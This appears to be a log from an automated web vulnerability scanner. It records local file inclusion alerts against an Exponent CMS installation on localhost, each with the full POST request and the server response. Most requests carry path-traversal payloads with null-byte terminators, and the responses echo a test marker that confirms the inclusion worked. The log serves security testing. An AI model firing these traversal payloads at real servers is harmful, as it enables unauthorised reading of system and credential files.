Alert Name: Local File Inclusion POST /exponent/index.php?action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.0 500 Internal Server Error Date: Fri, 08 Oct 2010 22:18:06 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=0s4kgdn3243s12hrellvjojvs2; expires=Sun, 16-Jan-2011 22:18:06 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 11 Connection: close Content-Type: text/html; charset=UTF-8 LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/login_redirect.php?ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&src=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&redirecturl=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&int=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&_common=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 347 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x Content-Disposition: form-data; name="msg" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.0 500 Internal Server Error Date: Fri, 08 Oct 2010 22:18:17 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=2mic7qrmgh2aeak7829khtveq3; expires=Sun, 16-Jan-2011 22:18:17 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 11 Connection: close Content-Type: text/html LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/mod_preview.php?action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&view=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:18:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=umhcrkpub99vg5sssnfend2ad5; expires=Sun, 16-Jan-2011 22:18:23 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 495 Content-Type: text/html My New Exponent Site LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/mod_preview.php?ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&view=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:18:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=ee547pg6801vfgqab2sm3b9hp4; expires=Sun, 16-Jan-2011 22:18:23 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 495 Content-Type: text/html My New Exponent Site LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/mod_preview.php?action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&view=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:18:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=mgnv92lifgpaukb6hc51hm1a51; expires=Sun, 16-Jan-2011 22:18:24 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 495 Content-Type: text/html My New Exponent Site LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/podcast.php?ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&src=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&int=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.0 500 Internal Server Error Date: Fri, 08 Oct 2010 22:18:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=u2ndah7ncls5hvc9755i8q8sa7; expires=Sun, 16-Jan-2011 22:18:51 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 11 Connection: close Content-Type: text/html LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/podcast.php?printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&src=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&int=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.0 500 Internal Server Error Date: Fri, 08 Oct 2010 22:18:51 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=f2pug3rv3i60jfj8ai2co8cl61; expires=Sun, 16-Jan-2011 22:18:52 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 11 Connection: close Content-Type: text/html LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/popup.php?ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&src=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&int=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&_common=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 181 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt ------x-- HTTP/1.0 500 Internal Server Error Date: Fri, 08 Oct 2010 22:18:58 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Set-Cookie: PHPSESSID=7vca15rduktmsj7ttj2i72jtd2; expires=Sun, 16-Jan-2011 22:18:58 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 11 Connection: close Content-Type: text/html LFI_Test123 ---------------------------------------------------------------- Alert Name: Local File Inclusion POST /exponent/rss.php?expid=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&ajax_action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&printerfriendly=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&action=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00§ion=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&src=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&int=..%